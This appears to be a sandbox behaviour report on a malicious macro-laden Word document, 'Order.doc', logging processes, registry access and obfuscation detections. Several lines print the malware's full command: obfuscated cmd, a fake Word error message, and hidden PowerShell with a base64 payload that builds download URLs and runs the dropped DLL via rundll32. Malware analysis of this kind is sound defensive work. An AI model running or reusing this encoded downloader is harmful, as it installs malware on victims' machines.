                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....&......0.N.....................r.......|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....'................#.............}..v....0(......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ..........j.....J`...............#.............}..v.....+......0.N.............8G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....x,................#.............}..v.....,......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................v.j....E.h...............#.............}..v....@<......0.N...............`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................v.j....E.h...............#.............}..v.....z......0.N...............`.............|...............
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: Order.docVirustotal: Detection: 32%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090952094.0000000002AB0000.00000002.00000001.sdmp
                      Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2091329494.0000000002BF7000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: Order.docStream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgA